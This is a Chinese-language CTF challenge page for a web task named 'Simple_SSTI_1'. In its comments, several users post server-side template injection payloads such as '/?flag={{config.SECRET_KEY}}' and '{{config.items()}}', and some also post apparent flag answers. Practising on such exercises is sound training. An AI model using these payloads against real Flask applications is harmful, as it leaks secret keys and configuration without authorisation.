Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 28736
提  示:
描  述:
Simple_SSTI_1
评论
哒哒哒哒 3年前

为什么是config啊

回复 0

行走的五花肉 3年前

flag{a380d84667198e9595af337cc6e37c40}

回复 0

maniubi12212 3年前

http://114.67.175.224:11449/?flag={{config.SECRET_KEY}}

回复 4

bigbox1 3年前

?flag={{config.items()}}

回复 2

kaif 3年前

/?flag={{config.SECRET_KEY}}

回复 1

tqn0312 3年前

这是要干什么啊,一脸懵逼

回复 1
RcookieCookie 3年前

flask模板里有一个重要的配置变量叫SECRET_KEY,用注入的方法获取到这个变量的值就可以了。SSTI的意思是模板注入

回复 0

joec 3年前

6f12b67d0c6fb7c61136e12e876a5ccc

回复 0

DK2021 3年前

flag{fb6d9d0fae960a37d270e86bd0e18351}

回复 0

bugku1233 3年前

/?flag={{config.SECRET_KEY}}

回复 0

earlyyue 3年前

/?flag={{config}}

回复 0

WriteUp

image
valecalida

5 金币

评分(50)

解题动态

everystep 攻破了该题 21小时前
爱喝畅汁 攻破了该题 22小时前
Tylione 攻破了该题 2天前
lx723823 攻破了该题 2天前
Asher 攻破了该题 3天前
hyj11125 攻破了该题 3天前
时倾77 攻破了该题 3天前
Aurora* 攻破了该题 3天前
lizhibin 攻破了该题 3天前
lee8ly 攻破了该题 3天前
Sonetto 攻破了该题 3天前
Wendmin 攻破了该题 3天前
lmz123 攻破了该题 3天前
CD123456 攻破了该题 4天前
3121834271 攻破了该题 4天前
SamJij 攻破了该题 5天前
林蔓露 攻破了该题 6天前
Ash_1070 攻破了该题 7天前
Aromatic 攻破了该题 7天前
沧颜 攻破了该题 7天前
问题反馈